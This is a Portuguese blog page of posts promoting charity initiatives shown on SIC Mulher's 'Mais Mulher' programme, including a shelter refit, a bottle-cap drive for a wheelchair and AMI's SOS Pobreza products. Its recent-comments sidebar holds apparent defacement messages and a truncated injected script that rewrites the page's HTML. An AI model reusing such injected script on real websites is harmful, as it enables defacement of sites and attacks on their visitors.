SIC Esperança @ 18:35

Ter, 26/03/13

Quanto a esta iniciativa, nasceu de um pedido da Associação de Mulheres Contra a Violência (AMCV) para equipar e requalificar uma casa abrigo da Instituição, que acolhe temporariamente mulheres e os seus filhos, vítimas de violência doméstica.

A SIC Esperança contactou a Jetclass, empresa de mobiliário sediado em Valongo, que doou todo o mobiliário solicitado.

E se você também quer apoiar esta causa, não perca o Mais Mulher desta quarta-feira, às 17:30 na SIC MUlher!

 

E se não viu. Veja o vídeo aqui!

 



O Projeto Comunidades, dinamizado pelo Chapitô em parceria com a SIC Esperança insere a sua tónica na participação e no envelhecimento ativo, visando a exploração de competências de cerca de 300 utentes divididos por 10 instituições de solidariedade social nos concelhos de Lisboa e Oeiras, através de um conjunto de dinâmicas pensadas, relativamente, à adequabilidade das faixas etárias.

O Projeto divide-se em três eixos de intervenção: o envelhecimento ativo, a participação e a integração e em três etapas: a primeira centra-se no reconhecimento territorial institucional, na descoberta dos universos e gostos individuais de cada utente inserido num coletivo, assim como, na construção de relações de empatia, comunicação e confiança.

A segunda etapa, onde atualmente a equipa de intervenção se encontra, articula-se com o desenvolvimento e aprendizagem de dinâmicas relacionadas com a temática do teatro, canto e vivências experienciadas outrora. Nesta etapa, além da componente formativa da ação, a equipa visa a preparação e construção de uma estrutura final a ser apresentada, pelos utentes, à instituição, famílias e possíveis instituições parceiras, envolvendo o todo na criação de um laço em comunidade.

A terceira etapa articula-se com a fase de implementação de projeto, em que, os utentes constroem uma intervenção final (espetáculo), que tem como propósito colocar as competências e saberes em prol do princípio da efetivação da participação e cidadania ativas.

Em todas as instituições em que a equipa Chapitô intervém nota-se um profundo crescimento dos utentes ao nível das dinâmicas realizadas, tais como, esculturas de balões (sendo uma experiência nova, a adesão foi completa, tornando-se num instrumento ótimo de trabalho), magia e dinâmicas vocais, musicais e teatrais. Além de obter uma adesão total por parte dos utentes, as reações das responsáveis institucionais são sempre construtivas e de confiança total.

Do ponto de vista metodológico, o projeto visa também promover a autonomia quer dos utentes na sua representação institucional, quer das próprias instituições, inovando socialmente no tipo de respostas, mais adequadas que promovam os princípios gerais, neste caso do projeto: - envelhecimento ativo, participação e integração.

 

Não perca este projeto tão especial que visa pelo desenvolvimento de toda a sociedade!

No Mais Mulher desta segunda-feira às 17:330 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 




faca_como_eu @ 18:31

Sab, 09/03/13

São um grupo de mulheres que se começou por juntar para apoiar o FCP, mas depressa percebemos que haveria muito mais a fazer por uma sociedade que atravessa um dos piores momentos da sua história.

Sempre ajudámos várias instituições assim como pessoas em particular, mas pensamos porque não fazê-lo de uma maneira mais próxima, mais eficaz e mais responsável, foi então que criámos esta página que visa ajudar todos quantos precisem, independentemente da cor clubística, crença religiosa, ideologia politica etc, dar a vida sem morrer é o nosso lema e ser solidário um modo de vida.

 

Não deixe de apoiar esta causa que tanto faz pela sociedade, visite a página oficial em Mulheres de Sangue Azul!

 

E não perca o Mais Mulher desta segunda-feira, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 




faca_como_eu @ 18:33

Sex, 22/02/13

O Marco vive em Almodovar e precisa da sua ajuda para comprar uma nova cadeira de rodas. Para isso precisa de 12 toneladas de tampinhas.

Nasceu com apenas com 27 semanas e pesava 1,5kg e as consequências de um nascimento prematuro resultaram numa paralisia cerebral, que o atiraram para uma cadeira de rodas.

É na piscina onde o Marco se sente melhor. Aqui ele pode movimentar-se livremente, quase como se não tivesse qualquer problema físico, como se não precisasse da sua pesada e velha cadeira de rodas...

Foi por iniciativa própria que pediu à mãe para o ajudar na recolha de tampinhas afim de comprar uma cadeira de rodas elétrica, que irá facilitar a sua mobilidade. Mas para que isso aconteça são necessárias 12 toneladas de tampinhas que podem ser transformadas em 8000 euros... o valor  de uma cadeira de rodas elétrica.
 
Na escola o Marco está bastante integrado, frequentando o 10º ano. Tem algumas disciplinas na sala de aula e outras na unidade multideficiências, onde desenvolve competências que tem mais dificuldade em executar.

Uma cadeira de rodas mais moderna, vai-lhe proporcionar uma inclusão ainda maior, uma autonomia maior, uma independência, nomeadamente  por parte da educação física.

 

Pois o desporto é muito importante na vida de todos nós. E o marco precisa de se desenvolver a nível motor, é o que tenta fazer nas aulas , mas é preciso um grande trabalho para que ele consiga melhorar dia após dia e facilite o seu trabalho e principalmente se torne mais autónomo e independente nas tarefas que tem de realizar.


Na escola tem havido um grande envolvimento por esta causa tanto do professores como dos alunos.
Desde que esta campanha começou o Marco conta com o apoio de praticamente toda a população de Almodôvar e tem já cerca de 3.000 kg de tampinhas.

 

Mas para as 12 toneladas ainda falta muito!
Ajude o Marco a aumentar este número,  entregando tampas de plástico e de metal nos Bombeiros, Escolas, juntas de freguesia e Câmara Municipal de Almodôvar.

E porque contamos consigo para ajudar o Marco …faça como nós.

 

E não perca esta história de coragem no Mais Mulher desta segunda-feira às 17:30 na SIC Mulher!

 

Mas se não viu. Veja o vídeo aqui!

 






faca_como_eu @ 17:02

Sex, 25/01/13

SOS Pobreza é a primeira marca de solidariedade nacional lançada pela AMI com o apoio de 9 produtores nacionais e 6 cadeias de distribuição.
São produtos básicos de consumo que estão à venda em alguns supermercados do Pingo Doce, Auchan (Jumbo), Continente, El Corte Inglés, E.Leclerc e Stapples. A receita reverte na totalidade a favor dos projetos da AMI de combate à pobreza em Portugal.

Através da venda de um conjunto de produtos de consumo básico como arroz, azeite, óleo alimentar, farinha, frutas sazonais, legumes sazonais, águas, sumos, papel higiénico, guardanapos, rolos de cozinha, entre tantas outros produtos.


Por isso são várias as razões por optar por comprar produtos SOS Pobreza. Para além de serem Nacionais!As receitas liquidas da venda dos produtos SOS Pobreza revertem inteiramente para os projectos da AMI de Combate à Pobreza em Portugal.

 

Logo a SOS Pobreza é dirigida a todos os consumidores portugueses que querem ajudar a alavancar a economia portuguesa, ao escolherem produtos nacionais e de boa qualidade a um preço justo e que querem ser socialmente responsáveis, ao ajudar uma causa sem despender dinheiro extra, apenas comprando produtos de consumo básico.

 

Um novo conceito de ajuda, no Mais Mulher desta segunda-feira, às 17:30, na SIC Mulher!

 

Veja o vídeo aqui!




oqueaconteceporai @ 18:30

Seg, 21/01/13

O Pai Natal presenteou em todos os centros comerciais, geridos pela Multi Mall Management (MMM), e deu às crianças um presente com futuro. Trata-se do livro do Gui que este ano tem associado uma bolsa de estudo no valor de 2500€, por cada um dos Centros. A MMM pretende, assim, apoiar as famílias portuguesas na educação e formação dos seus filhos.

 

A 6.ª edição do Livro do GUI, "A brincar, a brincar a sua profissão irá encontrar", tem este ano como mote o futuro dos mais pequenos, e por isso quer desperta-los para as suas profissões de sonho. E, é a partir desta mensagem pedagógica que foi lançado o desafio: Concorrer à Bolsa de Estudo do Gui.

 

 

 

O processo de candidatura foi muito simples. Crianças entre os 8 e os 12 anos escreveram uma carta ao Gui, em que contavam o que queriam ser quando fossem grandes, a razão desse desejo, e o que pretendem fazer para o conseguir. Por Centro Comercial foi nomeado um distinto júri, que escolheu uma dessas cartas. Venceu a que a mais criativa, original, mas também a que transparecia bons valores e princípios. Desta forma, uma criança por Centro recebeu uma bolsa no valor de 2500€ para investir na sua educação.

 

O concurso decorreu entre 17 de Novembro, data de chegada do Pai Natal aos centros, até ao dia 24. Para além do livro que o Pai Natal ofereceu às crianças quando estas o visitavam nos centros, a administração de cada Shopping da MMM vai também enviar um convite a todas as crianças que estejam a frequentar o 1º ciclo escolar, para escreverem uma carta ao Gui.

 

Uma iniciativa a não perder, no Mais Mulher desta terça-feira, às 17:30, na SIC Mulher!

 

Veja o vídeo aqui!

 



A HELPO é uma Organização Não Governamental, reconhecida pelos órgãos oficiais de todos os países onde trabalha com equipas implementadas de forma permanente.


Através de projectos estruturais, educativos, formativos e de assistência humanitária, trabalhamos para a capacitação dos indivíduos, de modo a promover o desenvolvimento comunitário intrínseco e a permitir às gerações futuras, uma vida mais digna e saudável!

 

As crianças que acompanhamos (sobre)vivem em desequilíbrios constantes do seu bem-estar. A maior parte, mesmo antes de completar os 5 anos de vida, já passou por vários episódios de doenças infecciosas graves como o paludismo/malária, infeções respiratórias agudas, diarreias e disenterias. Lidam diariamente com parasitoses e cáries dentárias. Desequilibram o sistema imunitário em constantes episódios de doenças e tomas de medicamentos e não o fortalecem com o que de melhor há para fortalecer um organismo, a boa alimentação.


Mas através da HELPO hoje, mais de cinquenta crianças, que até então tinham uma alimentação insuficiente, bebem um copo de leite por dia, recebem arroz e feijão para enriquecer a dieta pobre que os deixava mais vulneráveis e menos resistentes a estas doenças. A par da alimentação, vem a higiene. Sabonetes medicinais, escovas e pastas de dentes são bens que temos garantido a estas crianças. E, mais importante ainda, as consultas! Aqui focamo-nos na consciencialização de mamãs, papás e avós, no cuidado e na atenção, na importância dos primeiros anos de vida de uma criança.

 

Com Elizabete Catarino, nutricionista do programa Materno-Infantil vamos falar sobre esta grande instituição que tem vindo a melhorar a vida de tantas crianças e mamãs!

 

No Mais Mulher desta segunda-feira, às 17:30 na SIC Mulher!

 

Veja o vídeo aqui!




SIC Esperança @ 14:02

Sex, 30/11/12

Como já tem vindo a ser tradição, o Grupo Impresa, através da SIC Esperança, organiza a sua ação anual de voluntariado, este ano no Centro de Convívio do Centro Social Paroquial Nossa Senhora de Porto Salvo.


Este Centro Comunitário visa promover o bem-estar físico, psicológico e social de pessoas com mais de 65 anos residentes na freguesia de Porto Salvo, e conta atualmente com 44 utentes.
Como as instalações se encontram muito degradadas, o nosso objetivo passará por transformar esta instituição num local seguro e confortável onde este grupo de cidadãos seniores se possa reunir diariamente e desenvolver diversas atividades.


Desafiamos os trabalhadores do Grupo Impresa e os seus familiares a unirem esforços para conseguirmos concretizar mais um projeto de solidariedade.

 

Veja o vídeo aqui!




oqueaconteceporai @ 18:33

Ter, 27/11/12

A exposição solidária conta com a participação de diversas figuras do mundo das artes, que se associam à causa e expõem peças de pintura, escultura, artes plásticas e moda com o objetivo de angariar fundos para a unidade móvel de rastreios da LPCS “Saúde+Perto”.

 

Marcam presença artistas de renome nestas várias áreas como: Paula Rego, Eduardo Nery, Júlio Pomar, João Cutileiro, Sofia Areal, Anna Westerlund, André Boto, Ana Salazar, José António Tenente, Luís Buchinho, Joana Vasconcellos, Alice Vieira e Rita Guerra, entre outros.

 

Não perca nada sobre este evento no Mais Mulher às 17:30 na Sic Mulher!

 

Veja o vídeo aqui!




oqueaconteceporai @ 18:32

Ter, 27/11/12

Com vista a angariar fundos, para poder continuar a ajudar mulheres economicamente desfavorecidas a adquirir empregos, a manter as suas novas posições e a ter sucesso no mundo do trabalho, a Dress for Success irá realizar o “Mercado do Salto Alto”.

 

Este evento terá lugar no Palácio Quintela (apoiado pelo IPAM) no Chiado, de 29 de Novembro a 01 de Dezembro. Poderão visitar o espaço nestas três datas, das 10h às 20h, a entrada é gratuita.

 

Os fundos serão reunidos com a venda de roupa (nova e em 2ª mão), com valores entre 1€ e 15€, uma boa sugestão para quem também procura peças diferentes e a preços acessíveis.

 

No dia 30, pelas 15h, terá lugar um workshop orientado por Vanda Neves e baseado no seu livro “Marketing da Mulher”, prevêem-se outras atividades que serão reveladas mais próximo do evento.

 

Não perca tudo sobre esta iniciava no Mais Mulher, na Sic Mulher, às 17:30!

 

Veja o vídeo aqui!



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO